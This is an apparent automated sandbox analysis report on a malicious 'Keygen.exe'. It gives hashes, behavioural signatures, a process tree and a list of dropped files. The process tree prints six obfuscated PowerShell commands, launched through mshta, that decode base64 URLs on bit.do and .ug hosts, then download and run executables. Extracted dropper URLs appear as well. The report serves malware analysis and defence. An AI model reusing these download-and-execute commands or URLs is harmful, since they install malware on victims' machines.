Overview

overview

10

Static

static

10

08751be484...2d.dll

windows10-ltsc_2021-x64

10

0a9f79abd4...51.exe

windows10-ltsc_2021-x64

3

0di3x.exe

windows10-ltsc_2021-x64

10

2019-09-02...10.exe

windows10-ltsc_2021-x64

10

2c01b00772...eb.exe

windows10-ltsc_2021-x64

10

31.exe

windows10-ltsc_2021-x64

10

3DMark 11 ...on.exe

windows10-ltsc_2021-x64

3

42f9729255...61.exe

windows10-ltsc_2021-x64

10

5da0116af4...18.exe

windows10-ltsc_2021-x64

10

69c56d12ed...6b.exe

windows10-ltsc_2021-x64

10

905d572f23...50.exe

windows10-ltsc_2021-x64

10

948340be97...54.exe

windows10-ltsc_2021-x64

10

95560f1a46...f9.dll

windows10-ltsc_2021-x64

5

Archive.zi...3e.exe

windows10-ltsc_2021-x64

8

DiskIntern...en.exe

windows10-ltsc_2021-x64

3

ForceOp 2....ce.exe

windows10-ltsc_2021-x64

7

HYDRA.exe

windows10-ltsc_2021-x64

10

KLwC6vii.exe

windows10-ltsc_2021-x64

1

Keygen.exe

windows10-ltsc_2021-x64

10

Lonelyscre...ox.exe

windows10-ltsc_2021-x64

3

LtHv0O2KZDK4M637.exe

windows10-ltsc_2021-x64

10

Magic_File...ja.exe

windows10-ltsc_2021-x64

3

OnlineInstaller.exe

windows10-ltsc_2021-x64

8

Remouse.Mi...cg.exe

windows10-ltsc_2021-x64

SecuriteIn...dE.exe

windows10-ltsc_2021-x64

10

SecuriteIn...ee.dll

windows10-ltsc_2021-x64

10

SecurityTa...up.exe

windows10-ltsc_2021-x64

5

Treasure.V...ox.exe

windows10-ltsc_2021-x64

3

WSHSetup[1].exe

windows10-ltsc_2021-x64

3

Yard.dll

windows10-ltsc_2021-x64

10

b2bd3de3e5...2).exe

windows10-ltsc_2021-x64

10

cobaltstri...de.exe

windows10-ltsc_2021-x64

10

Resubmissions

16/04/2025, 11:04

250416-m58gsaz1ay 10

15/04/2025, 17:34

250415-v5ylksypw9 10

15/04/2025, 06:16

250415-g1p7ras1dw 10

14/04/2025, 08:06

250414-jzpwpstxhx 10

14/04/2025, 07:59

250414-jvg1assky4 10

14/04/2025, 07:22

250414-h7g1dss1h1 10

14/04/2025, 07:16

250414-h3xv2s1nv6 10

11/04/2025, 21:39

250411-1h113szzaz 10

Analysis

  • max time kernel
    141s
  • max time network
    115s
  • platform
    windows10-ltsc_2021_x64
  • resource
    win10ltsc2021-20250410-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250410-enlocale:en-usos:windows10-ltsc_2021-x64system
  • submitted
    14/04/2025, 07:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Keygen.exe

  • Size

    849KB

  • MD5

    dbde61502c5c0e17ebc6919f361c32b9

  • SHA1

    189749cf0b66a9f560b68861f98c22cdbcafc566

  • SHA256

    88cad5f9433e50af09ac9cad9db06e9003e85be739060b88b64186c05c0d636b

  • SHA512

    d9b8537f05844ec2f2549e2049e967a8023bfe432e3a9cf25fc0f7ad720e57a5830be733e1812cc806c5b68cd9586a031e394f67fc7e3f7fe390625fd5dedfbb

  • SSDEEP

    24576:uSdQdKdRdOdHdmHBnWs/nROBiGR4+hazer+Vufo/JxBYQ5:hH9DnR1Z+45Ufo/PBL

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://bit.do/fqhHT
exe.dropper

http://bit.do/fqhHT

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 2 IoCs
    defense_evasion
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Keygen.exe
    "C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3440
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9441.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4128
      • C:\Users\Admin\AppData\Local\Temp\9441.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:4068
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9441.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1964
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1756
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9441.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4300
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:324
      • C:\Windows\SysWOW64\timeout.exe
        timeout 1
        3⤵
        • System Location Discovery: System Language Discovery
        • Delays execution with timeout.exe
        PID:2008
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9441.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2476
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2628
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9441.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2808
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3728
      • C:\Windows\SysWOW64\timeout.exe
        timeout 2
        3⤵
        • System Location Discovery: System Language Discovery
        • Delays execution with timeout.exe
        PID:2352
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9441.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4552
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3232
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9441.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4048
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:460

Network

MITRE ATT&CK Enterprise v16

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    12bdf3bfbe10afc0b9b8a30fe850f3dc

    SHA1

    882017f1f6a343f271a6b2849b85b45ff1e70831

    SHA256

    757e90fd2cd589edaea349007bc83485bc9f8ce0099e3cf28ce12dd0d7aa558b

    SHA512

    2f0c33f86a95a7bd7410e149072c2ebb28850be6debbcde7b735f7c564abd9871cdd19fc549b6a0a1183c30b0e525bccae794aa91aef2e4aa270c41904fca14e

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Filesize

    53KB

    MD5

    e8142d40307a5aa4ff0f929233c3a4eb

    SHA1

    247de520bb627ececc53cfc04be6f1cd055eea73

    SHA256

    791d0741f67ffae89971b342f7575a140baae5a75ec2484c7cd9a398a30e48be

    SHA512

    9a74e936083ae81c3579c7223ac4ba765fbf1c3d81059667b6e08c61c61df3630bb304eb81aa257a6b9bd35821a3c37d2d668265cd704c50711848686cf5f4f9

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    e71bc7c92667f6cf87bb935e480c4f2a

    SHA1

    549155e6eb06629fd70219e3dc85bf796176a7c1

    SHA256

    591c5a491154831ee2de2e09f54751564e37313621e730231fa228c5ca20d63b

    SHA512

    bb694fc1b2fbb964e576bdcc05f6ef01906b83988166a7d17c1a2458dc68b0a0adb350d29d4996160f828764fbb61b061b3ca6c840b82468af5f702e7c1e0e68

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    3e5c83f95be3250e3e1a70a7ac86e61b

    SHA1

    1c3549a24b45292308ae994c588830cb4e5ff41c

    SHA256

    e68b5ea13e7b63922b2e5c5d3267821be3e8848cdb497ebd1bb1285b7eecea68

    SHA512

    f5dd53197bbd120d9301522e8569087b74be5ef0e9e398b9e1c6bfa4f5f3cd2fd9674d1cc1a186b67466526a73dd028b5f865442737bf0d45b8b0dd45a5232e9

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    15KB

    MD5

    753b091f6f1d068b73ead0ba28b5f2ad

    SHA1

    3dbbac9274caef232582c611e822f4c3a36fd1b8

    SHA256

    283356d401fffa400fcc9df21e05db518c2b2b76b457c2efde21ad938d37039e

    SHA512

    121f6669b1d07566f094adeaca3bd0ac4166648f1b0638b4d995f1d333f7ae2c7b35c1e52d7690ce73c6ccb9076ffe5f2a39669b47d46ab7a33b53c462c971d5

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    ac57d9d0ac4781ae0aa2277d2bdf6bda

    SHA1

    758f1c6c50af953679bbd6efcb215b491dfd45bf

    SHA256

    b7cd6b97abc1bf55ed4700eafd4547f7b2337645c64bff13a7273d77f13f466b

    SHA512

    76f007003f05d9b612fa5b9ed2e90cdf5f4852376a20a5ea1f12de748d153f45b136a85ce70cfc9dbd9cdea41b3e6e537e405b8be3d62d4c85f6bb489fa1cadd

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    764B

    MD5

    47bbb387865d5f60b2db3a59b3cdc220

    SHA1

    73fb07fad277feb644fcfcf143d7abd09545af39

    SHA256

    1d4a867a0ea396049b08920275627d1c6c625ddbdf0e2e6400d73d90f6183145

    SHA512

    89f77957b85818234dd8fe993412266457ceedb6ce11040c6cdd28a69c161f8d2bf714ce991e8abf7159ef3a8dc7200ea12325065be1f260186f57a4b7d9788a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\9441.tmp\Keygen.exe
    Filesize

    678KB

    MD5

    ea2c982c12fbec5f145948b658da1691

    SHA1

    d17baf0b8f782934da0c686f2e87f019643be458

    SHA256

    eecd6f108f35df83d4450effa5d5640efe7e5f2fff819833f01fb2d053e626d4

    SHA512

    1f1d6768467fff8387be1cf536e01cfbf28cb04777fa184f18fcab0c518ead8d52827abe5ca1c566c425616c7b06ab1bce0c92dd684c818b51fc52fa0f4b74b8

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\9441.tmp\b.hta
    Filesize

    17KB

    MD5

    5bbba448146acc4530b38017be801e2e

    SHA1

    8c553a7d3492800b630fc7d65a041ae2d466fb36

    SHA256

    96355db8fd29dcb1f30262c3eac056ff91fd8fa28aa331ed2bedd2bd5f0b3170

    SHA512

    48e3d605b7c5531cb6406c8ae9d3bd8fbb8f36d7dd7a4cbe0f23fc6ef2df08267ce50d29c7ec86bf861ebdcf9e48fb9c61c218f6584f1a9a0289a10a2fec730b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\9441.tmp\b1.hta
    Filesize

    17KB

    MD5

    c57770e25dd4e35b027ed001d9f804c2

    SHA1

    408b1b1e124e23c2cc0c78b58cb0e595e10c83c0

    SHA256

    bb0fd0011d5a0c1bbb69cb997700eb329eee7bed75fef677122fcfda78edc7f5

    SHA512

    ac6d957d2b6218d9c19dea60b263d6148f730a7a4599e03023afc0881b9f4051d20e5f1d94fc3e416c5e12bcc9846a43af90f55767271ef0cc4b84f31f432ae7

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\9441.tmp\ba.hta
    Filesize

    17KB

    MD5

    b762ca68ba25be53780beb13939870b2

    SHA1

    1780ee68efd4e26ce1639c6839c7d969f0137bfd

    SHA256

    c15f61a3c6397babdf83b99b45345fec9851c4d3669c95b717f756b7c48050d1

    SHA512

    f99570d2dae550cb1474e2d1cabf8296a685e0e7254d92eb21d856acb8dece635a0842a00d63da2a4faa18c52c57244c565d6a752c857d5c15e8c23b3d4a9e1a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\9441.tmp\ba1.hta
    Filesize

    17KB

    MD5

    a2ea849e5e5048a5eacd872a5d17aba5

    SHA1

    65acf25bb62840fd126bf8adca3bb8814226e30f

    SHA256

    0c4ffba2e00da7c021d0dcab292d53290a4dc4d067c029e5db30ba2ac094344c

    SHA512

    d4e53c150e88f31c9896decfaa9f0a8dfab5d6d9691af162a6c0577786620fb1f3617398fc257789a52e0988bf1bfc94255db6d003397863b0b9e82afabdb89f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\9441.tmp\m.hta
    Filesize

    17KB

    MD5

    9383fc3f57fa2cea100b103c7fd9ea7c

    SHA1

    84ea6c1913752cb744e061ff2a682d9fe4039a37

    SHA256

    831e8ee7bc3eeeaaa796a34cbb080658dec1be7eb26eb2671353f650041b220d

    SHA512

    16eda09f6948742933b6504bc96eb4110952e95c4be752e12732cb3b92db64daa7a7a0312ca78ff1ceb7cffd7bd8a7d46514226fc3cea375b4edb02a98422600

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\9441.tmp\m1.hta
    Filesize

    17KB

    MD5

    5eb75e90380d454828522ed546ea3cb7

    SHA1

    45c89f292d035367aeb2ddeb3110387a772c8a49

    SHA256

    dd43305abbbe5b6cc4ab375b6b0c9f8667967c35bb1f6fefb0f1a59c7c73bd5e

    SHA512

    0670ef4f687c4814125826b996d10f6dd8a1dd328e04b9c436ee657486b27b1eefad5b82dcc25bd239d36b7ac488f98e5adcff56c5e82f7d0ed41f03301947c4

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\9441.tmp\start.bat
    Filesize

    176B

    MD5

    68d86e419dd970356532f1fbcb15cb11

    SHA1

    e9ef9a9d047f1076ba2afbe4eabec2ea2338fb0a

    SHA256

    d150a28b978b2d92caac25ee0a805dec96381471702a97f1099707b8538c6cbe

    SHA512

    3078c8c33b18ca1aa3bb2f812e5f587f5b081a4bd857f942ab382383faf09dbe8af38054546bf49037b79081c9406dc25647ae5bd843abc8fcca25c7b3afae14

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ey2siudv.psm.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/324-105-0x0000000008E30000-0x00000000093D6000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/324-31-0x0000000005230000-0x0000000005266000-memory.dmp

    Filesize

    216KB

    Download

  • memory/324-79-0x0000000008200000-0x000000000887A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/324-80-0x0000000006DB0000-0x0000000006DCA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/324-59-0x0000000006890000-0x00000000068AE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/324-54-0x0000000006390000-0x00000000066E7000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/324-103-0x0000000007E00000-0x0000000007E96000-memory.dmp

    Filesize

    600KB

    Download

  • memory/324-104-0x0000000007D90000-0x0000000007DB2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/324-34-0x00000000061B0000-0x0000000006216000-memory.dmp

    Filesize

    408KB

    Download

  • memory/324-60-0x00000000068E0000-0x000000000692C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/324-33-0x0000000006110000-0x0000000006132000-memory.dmp

    Filesize

    136KB

    Download

